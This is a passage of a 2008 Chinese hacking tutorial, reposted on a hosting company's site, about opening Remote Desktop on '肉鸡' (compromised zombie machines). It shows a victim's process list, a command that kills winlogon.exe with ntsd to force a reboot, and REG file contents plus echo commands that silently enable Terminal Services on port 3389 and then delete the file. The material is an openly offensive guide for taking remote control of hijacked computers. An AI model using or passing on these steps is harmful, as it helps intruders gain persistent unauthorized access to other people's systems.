手机站
网通分站
电信主站
密 码:
用户名:
当前位置 : 主页>服务器技术>安全防护>列表

黑客必学:开启肉鸡终端全攻略

来源:互联网 作者:west263.com 时间:2008-02-23
西部数码-全国虚拟主机10强!40余项虚拟主机管理功能,全国领先!双线多线虚拟主机南北访问畅通无阻!免费赠送企业邮局,.CN域名,自助建站480元起,免费试用7天,满意再付款! P4主机租用799元/月.月付免压金!

  228  services.exe

  240  lsass.exe

  424  svchost.exe

  472  spoolsv.exe

  512  msdtc.exe

  616  svchost.exe

  628  KAVSvc.EXE

  660  llssrv.exe

  692  nvsvc32.exe

  728  regsvc.exe

  748  MSTask.exe

  776  alter.exe

  900  svchost.exe

  916  WinMgmt.exe

  1088  Dfssvc.exe

  484  Explorer.EXE

  1444  mdm.exe

  1340  Server.exe

  1224  ibguard.exe

  1252  KAVSvcUI.EXE

  1256  ibserver.exe

  1336  internat.exe

  1204  Uspds.exe

  720  bar.exe

  1288  dllhost.exe

  1580  inetinfo.exe

  1672  cmd.exe

  1464  pppoe.exe

  1704  regedit.exe

  316  cscript.exe

  从上面可以看出当前winlogon.exe的PID号为200运行命令ntsd -c q -p 200 (这里的200要替换为winlogon.exe进程对就的PID啦)过会儿机器马

  上重启了(ntsd.exe是WIN自带的可用来结束任意级别进程)等着收获吧~~

  二、winxp和win2003终端开启

  开启的REG文件代码如下:

  Windows Registry Editor Version 5.00

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]

  "fDenyTSConnections"=dword:00000000

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]

  "PortNumber"=dword:00000D3D

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]

  "PortNumber"=dword:00000D3D

  用以下ECHO代码写一个REG文件:

  echo Windows Registry Editor Version 5.00>>3389.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg

  echo "fDenyTSConnections"=dword:00000000>>3389.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg

  echo "PortNumber"=dword:00000d3d>>3389.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg

  echo "PortNumber"=dword:00000d3d>>3389.reg

  regedit /s 3389.reg

  del 3389.reg

  这样xp和2003开启终端是不用重启的如果你想改端口只需把上面的两个PortNumber对应的D3D改成相应十进制数的十六进制形式就可以了!用计算器转换吧。XP下不论开终端还是改终端端口都不需重启,真是太妙了~~呵呵。如果要关闭终闭只需把"fDenyTSConnections"=dword:00000000

  改成"fDenyTSConnections"=dword:00000001

文章整理:西部数码--专业提供域名注册虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!